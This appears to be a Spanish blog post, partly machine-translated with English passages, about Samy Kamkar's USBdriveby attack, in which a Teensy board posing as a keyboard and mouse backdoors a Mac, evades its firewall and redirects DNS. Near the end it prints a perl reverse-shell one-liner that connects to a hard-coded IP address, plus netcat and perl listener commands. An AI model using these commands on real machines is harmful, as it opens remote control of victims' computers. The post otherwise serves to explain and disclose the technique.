Basta conectar la USBDribeBy
a un equipo para que se identifique como un teclado y un ratón
convencionales, abra la aplicación Terminal, instale una puerta trasera
en Chrome, configure apropiadamente los ajustes de red, recoja sus cosas
y deje todo como estaba. El proceso es completamente automático y
apenas dura un minuto en el que el ordenador, eso sí, parece poseído por
el mismísimo Satán.
El
resultado es que todo el tráfico del equipo se redirige al ordenador del
asaltante, que puede espiar lo que quiera o tomar el control del equipo
hackeado en el momento en el que lo considere necesario.
Algunos de
los cambios en la configuración se resisten a realizarse solo desde un
teclado, pero Kamkar ha encontrado maneras de sortear esos obstáculos
mediante movimientos ciegos de ratón. Aunque este hacker ha realizado la
prueba en un Mac, asegura que es perfectamente aplicable a Windows y
Linux.
Evidentemente,
el hack no es tan temible si protegemos nuestro equipo mediante una
contraseña de entrada, pero los ciberdelincuentes no suelen ser
amistosos hackers con un USB al cuello que muestran sus progresos en
YouTube. Si Samy ha logrado hacer esto, seguramente otros hayan dado con
formas peores de aprovechar el USB. La propia BadUSB es más peligrosa
por la cantidad de malware que permite inocular. [Samy Kamkar vía Hacker News]
En este proyecto, vamos a aprender cómo explotar la confianza ciega de un sistema en dispositivos USB, y aprender cómo un microcontrolador Teensy $ 20 puede evadir varios ajustes de seguridad en un sistema real, abre una puerta trasera permanente, desactivar un servidor de seguridad, controlar el flujo de la red tráfico, y todo dentro de un par de segundos y de forma permanente, incluso después de que el dispositivo ha sido eliminado.
En concreto, cuando se conecta normalmente en un ratón o un teclado en una máquina, no se requiere autorización para empezar a usarlos. Los dispositivos pueden simplemente comenzar a escribir y hacer clic. Aprovechamos este hecho mediante el envío de pulsaciones de teclas arbitrarios significan para lanzar aplicaciones específicas (a través de Spotlight / Alfred / Quicksilver), evadir permanentemente un firewall local (Little Snitch), instale un shell inversa en crontab, e incluso modificar la configuración DNS sin permisos adicionales.
Aunque este ejemplo es el OS X, es fácilmente extensible para Windows y * nix.
Incluso nos evadimos de seguridad de OS X - mientras tratan de evitar cambios en la red están realizando con sólo un "teclado", e incluso prevenir la mayoría de las aplicaciones de cambiar de posición (características especiales de accesibilidad autorizados deben estar habilitadas que no tenemos permiso para), que evadir ambas cosas con un poco de applescript sin protección y los movimientos del ratón cuidadosamente planificadas. Mientras que un dispositivo como Rubber Ducky es similar, es incapaz de montar los mismos ataques, ya que carece de HID Ratón emulación.
Software necesario
- USBdriveby You can acquire the USBdriveby microcontroller source code from my github: https://github.com/samyk/usbdriveby
I've written it for both Teensy and Arduino microcontrollers, however not all Arduinos are capable of emulating a USB HID keyboard/mouse (the Arduino Nano specifically cannot).
- dns_spoofer.pl
I've created a DNS server which responds to normal DNS requests properly, however sends spoofed answers for specific hostnames. This runs on a remote host and allows us to manipulate the traffic of the system that's been hit by USBdriveby.
This is also available on my github: https://github.com/samyk/usbdriveby
- Net::DNS
My DNS spoofer depends on the Net::DNS suite of perl modules.
perl backdoor
We use a perl backdoor I developed as virtually all OS X and *nix machines have perl installed by default. You'll find many of these systems don't come with a C compiler, especially in the bare bones version, but perl is always quietly available.
perl -MIO::Socket -e'$c=new IO::Socket::INET("72.14.179.47:1337");print$c `$_`while<$c>'
- netcat
To evade the local router and not require any ports opening up, we produce a reverse shell by connecting out to a server we control every 5 minutes via crontab, and once the connection is established, we can begin sending commands to the compromised machine. If the connection dies, the compromised system will connect back within 5 minutes. netcat is an easy way to support this.
netcat -l 1337
You could also use perl in lieu of netcat again:
perl -MIO -e'$c=new IO::Socket::INET(LocalPort,1337,Listen)->accept;print$c $_ while'
Fuente:
http://es.gizmodo.com/este-aterrador-video-muestra-lo-facil-que-es-hackear-un-1672786120

No hay comentarios:
Publicar un comentario